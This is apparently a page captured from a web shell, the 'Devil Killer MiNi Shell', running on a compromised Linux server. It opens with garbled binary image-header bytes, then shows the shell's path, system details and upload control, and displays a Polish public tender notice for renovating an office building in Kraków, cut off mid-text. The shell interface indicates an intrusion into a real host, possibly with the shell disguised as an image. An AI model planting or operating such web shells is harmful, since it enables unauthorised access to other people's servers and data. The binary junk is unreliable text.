JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220718/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220718/0025914501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont generalny części budynku biurowego zlokalizowanego na działce nr 449/2 obr. 5 Śródmieście przy ul. K. Kordylewskiego 11 w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Małopolska Agencja Rozwoju Regionalnego S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350239017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kordylewskiego 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-542</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@marr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.marr.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> rozwój regionalny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont generalny części budynku biurowego zlokalizowanego na działce nr 449/2 obr. 5 Śródmieście przy ul. K. Kordylewskiego 11 w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a6738910-0414-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00259145</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://marr.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://marr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji:1.1. Elektronicznie za<br/>pośrednictwem Platformy znajdującej się pod adresem: https://marr.ezamawiajacy.pl w zakładce<br/>„Korespondencja”. 2.Za datę wpływu oświadczeń, wniosków, zawiadomień orazinformacji przyjmuje się<br/>datę dostarczenia wiadomości na adres e-mail<br/>Zamawiającego lub ich złożenia/wysłania na Platformie.3.Ogólne zasady korzystania z Platformy: a)<br/>zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie MARR<br/>S.A.;https://marr.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.b) Wykonawca po wybraniu<br/>opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje<br/>kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. c)Rejestracja Wykonawcy trwa<br/>maksymalnie do 2 dni roboczych. d)Po założeniu konta Wykonawca ma możliwość złożenia Oferty w<br/>postępowaniu. 4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ.<br/>Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję „Zadaj pytanie” lub<br/>przy użyciu zakładki „Korespondencja”. W celu zadania pytania, Wykonawca klika lewym przyciskiem<br/>myszy klawisz ZADAJ PYTANIE. Otwiera się okno, w którym należy uzupełnić dane Wykonawcy, temat<br/>i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z<br/>obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje<br/>potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;Pytanie wysłane&#34;. Zamawiający jest<br/>obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu<br/>składania ofert pod warunkiem że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie<br/>później niż na 4 dni przed upływem terminu składania ofert. 5.Treść pytań (bez ujawniania źródła<br/>zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, Zamawiający<br/>przekaże Wykonawcom za pośrednictwem Platformy Zakupowej. 6.W przypadku wątpliwości<br/>związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą<br/>Platforma zakupowa MARR S.A. tel. +48 22 257 2223 (infolinia dostępna w dni robocze, w godzinach<br/>9.00-17.00) e-mail: oneplace@marketplanet.pl.7.Dopuszczalny format podpisu elektronicznego: a)<br/>dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,b) dopuszcza się podpisanie<br/>dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. 8.Niezbędne wymagania<br/>sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej: a)Stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości niemniejszej niż 512 kb/s; b)Komputer klasy PC lub MAC, o konfiguracji: pamięć min 2GB Ram,<br/>procesorIntel IV 2GHZ, jeden z systemów operacyjnych - MS<br/>Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; c)Zainstalowana dowolna przeglądarka<br/>internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer<br/>minimalnie wersja 10.0;d)Włączona obsługa JavaScript; e)Zainstalowany program Acrobat Reader lub<br/>inny obsługujący pliki w formacie .pdf. 9.Dopuszczalne formaty przesyłanych danych tj. plików o<br/>wielkości do 100 MB w txt, rtf, pdf ,xps, odt,ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif,<br/>tiff, geotiff, png, svg, wav, mp3, avi, mpg,mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html,<br/>xhtml, css, xml, xsd, gml, rng, xsl, xslt,TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.10.Plik załączony<br/>przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany –format kodowania UTF8</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀁􀀁􀀁􀀁 administratorem Pani/Pana danych osobowych jest Małopolska Agencja Rozwoju Regionalnego S.A. z siedzibą w<br/>Krakowie<br/>(31-<br/>542) przy ul. Kordylewskiego 11, www.marr.pl, e-mail: biuro@marr.pl<br/>􀀁􀀁􀀁􀀁 administrator wyznaczył inspektora ochrony danych, z którym można się kontaktować w sprawach dotyczących Pani/Pana danych<br/>osobowych wysyłając email na adres: iod@marr.pl lub pisemnie na adres siedziby administratora (jak wyżej);<br/>􀀁􀀁􀀁􀀁 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. „c” i lit. „f” RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego pn.: „Remont generalny części budynku biurowego zlokalizowanego na działce nr 449/2 obr. 5 Śródmieście przy ul. K. Kordylewskiego 11 w Krakowie&#34; (ZP/15/22/DOF) prowadzonym w trybie podstawowym, o jakim stanowi<br/>art. 275 pkt 1 ustawy;<br/>􀀁􀀁􀀁􀀁 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 ze<br/>zm.), dalej „ustawa Pzp”;<br/>􀀁􀀁􀀁􀀁 Pani/Pana dane osobowe będą przez okres niezbędny do realizacji celów przetwarzania, lecz nie krócej niż okres<br/>wskazany w<br/>przepisach o archiwizacji tj. przez okres 10 pełnych lat od dnia zakończenia postępowania o udzielenie ww. zamówienia;<br/>􀀁􀀁􀀁􀀁 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp (podanie danych dobrowolne, ale konieczne do udziału w postępowaniu);<br/>􀀁􀀁􀀁􀀁 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie<br/>do<br/>art.<br/>22 RODO;<br/>􀀁􀀁􀀁􀀁 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀁􀀁􀀁􀀁 nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Małopolskiej Agencji Rozwoju Regionalnego S.A. w Krakowie<br/>oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru<br/>Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział<br/>Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako<br/>właściciel Platformy Zakupowej, na której Małopolska Agencja Rozwoju Regionalnego S.A. w Krakowie prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://marr.ezamawiajacy.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/15/22/DOF</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest remont pomieszczeń biurowych na parterze oraz na piętrach od I-IV w budynku przy ul. Kordylewskiego 11 w Krakowie w zakresie m.in. rozbiórek ścian działowych, budowy nowych ścian, aranżacji pomieszczeń, wykonania nowych posadzek, malowania, wykonania instalacji wentylacji, klimatyzacji, wodociągowej, kanalizacyjnej, centralnego ogrzewania, instalacji niskoprądowych i CCTV. Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych znajduje się w załączniku nr 3 do specyfikacji.<br/>Wykonawca udziela Zamawiającemu gwarancji na wszystkie wykonane prace i zamontowane w ramach Umowy urządzenia na okres 36 miesięcy, na zasadach określonych w Umowie. Zamawiającemu przysługuje również rękojmia na zasadach wynikających z Kodeksu cywilnego.<br/>W okresie trwania gwarancji i rękojmi Wykonawca zobowiązany jest do organizowania przeglądów okresowych ( w tym przeglądów ppoż zamontowanych urządzeń) w terminach 12, 24, i 36 miesięcy od dnia odbioru końcowego. Wykonanie każdego przeglądu zostanie potwierdzone Protokołem z przeglądu okresowego. <br/>W okresie trwania gwarancji Wykonawca jest zobowiązany wykonywać wszystkie przeglądy systemów wymienione w przepisach prawa, kartach gwarancyjnych, wskazówkach prawidłowej eksploatacji, dokumentacji techniczno-ruchowej, czy innych dokumentach dostarczonych przez producenta zamontowanych urządzeń wraz z wymianą materiałów eksploatacyjnych, np.: należy wykonać przegląd instalacji wentylacji wraz z wymianą filtrów.<br/>2.	Przedmiar w podziale na kondygnacje (parter wraz z piwnicą oraz piętra - od I-szego do IVego - znajduje się odpowiednio w załączniku nr 4a i 4b do specyfikacji.<br/>3.	Dokumentacja projektowa stanowi załącznik nr 4 do specyfikacji.<br/>4.	Prace budowlane zostaną zrealizowane w dwóch następujących etapach:<br/>a)	etap I –III i IV piętro budynku;<br/>b)	etap II – pozostały zakres zamówienia <br/>5.	Zamawiający sugeruje, aby prace generujące duży hałas lub duże zapylenie, stanowiące utrudnienie dla funkcjonowania nieremontowanych kondygnacji budynku były wykonywane od poniedziałku do piątku od godziny 16:00 do godziny 5:00 następnego dnia. W soboty i niedziele prace mogą być wykonywane przez całą dobę – do poniedziałku do godziny 5:00. Zamawiający zezwala na wykonanie niezbędnych prac generujących duży hałas lub duże zapylenie w godzinach od 5:00 do 16:00 pod warunkiem ich uprzedniego uwzględnienia w harmonogramie. Harmonogram robót z określeniem terminu realizacji prac, których nie można wykonywać po godzinie 16:00 bądź w dni wolne od pracy, zostanie przygotowany przez Wykonawcę w uzgodnieniu z Zamawiającym w terminie 5 dni kalendarzowych po podpisaniu umowy.<br/>6.	Ponadto Zamawiający wymaga, aby podczas prowadzenia wszystkich robót budowlanych Wykonawca zapewnił nieograniczony dostęp do budynku. Podczas remontu na części kondygnacji nieobjętych robotami budowlanymi będą pracować pracownicy Zamawiającego, a na wyższych kondygnacjach (powyżej IV piętra) swoją siedzibę m.in. ma sąd oraz architektoniczna pracownia projektowa, które również muszą mieć zapewnioną ciągłość funkcjonowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262700-8 - Przebudowa budynków</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312000-7 - Instalowanie systemów alarmowych i anten</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">217 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dot.zdolności technicznej lub zawodowej – Wykonawca spełni warunek, jeśli wykaże, że:<br/><br/> 1. zdolność zawodowa:<br/><br/>posiada doświadczenie zawodowe w wykonywaniu robót budowlanych odpowiadających swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia, tj.: że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – wykonał w tym okresie, minimum 1 (jedną) robotę budowlaną polegające na budowie, przebudowie, rozbudowie, remoncie budynku użyteczności publicznej o łącznej powierzchni użytkowej nie mniejszej niż 1000,0 m2 i wartości udzielonego zamówienia nie mniejszej niż 2 000 000,00 zł brutto, z wyłączeniem budynków architektury drewnianej.<br/>Zgodnie z par. 3 punkt 6) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. 2002.75.690 ze zm.) przez budynki użyteczności publicznej należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji. Jednocześnie zastrzeżono, że za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny. <br/>Robota budowlana może zostać wykazana, gdy jej realizacja została zakończona i odebrana przez Inwestora zgodnie z obowiązującą w dacie odbioru umową i przepisami powszechnie obowiązującego prawa.<br/><br/>W przypadku gdy jakakolwiek wartość dotycząca powyższego warunku wyrażona będzie w walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego Banku Polskiego (dalej: NBP) dla danej waluty z dnia, w którym nastąpiła publikacja przedmiotowego postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji.<br/><br/>W przypadku oferty składanej wspólnie (konsorcjum) warunek udziału w postępowaniu w zakresie zdolności zawodowej powinien spełnić co najmniej jeden z wykonawców składających ofertę wspólną.<br/><br/>2. zdolność techniczna: <br/><br/>Wykonawca zapewni, że przy realizacji zamówienia dysponować będzie następującymi osobami, które będą realizować roboty budowlane.<br/> a. Kierownik Budowy - posiadający doświadczenie w pełnieniu funkcji kierownika budowy, przebudowy, rozbudowy, remoncie w pełnym okresie budowy, tj. od daty przekazania terenu budowy wykonawcy robót do dnia zakończenia czynności odbioru końcowego robót, dla minimum 1 (jednej) roboty budowlanej, polegającej na budowie, przebudowie, rozbudowie, remoncie budynku użyteczności publicznej o łącznej powierzchni użytkowej nie mniejszej niż 1000,00 m2 która została zakończona oraz odebrana zgodnie z obowiązującymi w dacie odbioru przepisami powszechnie obowiązującego prawa zarówno przez inwestora jak i przez właściwe rzeczowo organy administracji publicznej. Osoba musi posiadać przez okres nie krótszy niż 2 lata uprawnienia budowlane bez ograniczeń, zgodnie z wymaganiami ustawy z dnia 7 lipca 1994r. Prawo budowlane do kierowania robotami budowlanymi w specjalnościach architektonicznej bądź konstrukcyjno-budowlanej lub posiadająca odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących 